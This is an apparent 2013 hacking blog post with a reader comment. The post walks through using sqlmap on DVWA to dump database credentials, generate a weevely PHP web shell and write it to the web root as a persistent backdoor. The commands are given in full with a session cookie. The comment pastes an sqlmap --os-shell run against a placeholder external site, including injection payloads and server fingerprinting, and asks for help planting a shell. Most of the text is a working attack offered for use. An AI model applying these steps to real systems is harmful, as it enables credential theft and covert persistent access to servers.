codename scx030c06c: upload backdoor via sql injection

Friday, 5 April 2013

upload backdoor via sql injection

from previous post i have been successfully penetrate into website's database, and now i will go to the next level. in this post i will explain steps to insert a backdoor via mysql so i can come back to the system whenever i want. in this experiment i used dvwa (damn vulnerable web application) website installed in localhost. the tools that i used are mantra, sqlmap, dirbuster, and weevely.

firstly open dvwa from web browser. before log in activate live HTTP header tool from menu>tools>application auditing>Live HTTP header to capture cookie and session to be used to bypass login for sqlmap

after log in, set security dvwa to low and go to sql injection menu. try to input ' to see the vulnerability from sql injection. and the error message means that the target is vulnerable.

copy url and run sqlmap to dump the database using the information gathered form previous step.

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=qqmt0g6sgvh802823qu1apnv84" --dbs

after that find the database and table contain username and password mysql to log in

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=qqmt0g6sgvh802823qu1apnv84" -D dvwa --tables

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=qqmt0g6sgvh802823qu1apnv84" -D dvwa -T users --dump

now i get the username and password from all users. next i will generate backdoor to insert into target. open weevely and generate backdoor. the backdoor stored in generate.php and has a password 123.

./weevely.py generate 1234 generate.php

after backdoor was made, i will upload the generate.php to /var/www/dvwa/bd.php.

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=qqmt0g6sgvh802823qu1apnv84" --file-write=/pentest/backdoors/web/weevely/generate.php --file-dest=/var/www/dvwa/bdr.php

now the backdoor is uploaded to the target. try to access via weevely

./weevely.py http://localhost/dvwa/bdr.php 1234

now we have sucessfully enter the system via backdoor. now i can play around with the system :)

2 comments:

Reindra Geeks Script19 June 2013 at 06:32
naaah ini nih yg ane cari bang dom2 :D

nice share deh ..!

bang dom2 maap nh numpang coret2 sekalian mau tanya :D
sekalian doong tutor upload shell dengan sqmap

sqlmap.py -u http://www.TERGET SQLI.com/view_ad.php?id=503 --os-shell --flush-session

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

[*] starting at 20:17:15

[20:20:45] [INFO] flushing session file
[20:20:45] [INFO] testing connection to the target URL
[20:20:48] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[20:20:51] [INFO] target URL is stable
[20:20:51] [INFO] testing if GET parameter 'id' is dynamic

[20:22:47] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:22:48] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[20:22:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[20:23:01] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[20:23:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - co
mment)'
[20:23:34] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
[20:24:07] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[20:24:25] [INFO] testing 'MySQL >= 5.0 time-based blind - Parameter replace'
[20:24:55] [INFO] testing 'MySQL < 5.0 time-based blind - Parameter replace (hea
vy queries)'
[20:24:56] [INFO] testing 'MySQL time-based blind - Parameter replace (bool*int)
'
sqlmap identified the following injection points with a total of 35 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=22 AND 7853=7853

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=22 AND (SELECT 6876 FROM(SELECT COUNT(*),CONCAT(0x7165647171,(SE
LECT (CASE WHEN (6876=6876) THEN 1 ELSE 0 END)),0x7161727371,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: id=22 UNION ALL SELECT NULL,NULL,CONCAT(0x7165647171,0x4e6248416e54
44576755,0x7161727371),NULL,NULL#
---
[20:28:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.8
web application technology: PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL 5.0
[20:28:17] [INFO] going to use a web backdoor for command prompt
[20:28:17] [INFO] fingerprinting the back-end DBMS operating system
[20:28:18] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>
>4
[20:29:39] [WARNING] unable to retrieve automatically the web server document ro
ot
what do you want to use for web server document root?
[1] common location(s) '/var/www/' (default)
[2] custom location
[3] custom directory list file
[4] brute force search
--------------------------------------------------------------------------------------------------
naah nagian yg ini nih ane binguung ..! tolong di jelasin bang :D
ReplyDelete
Replies

Add comment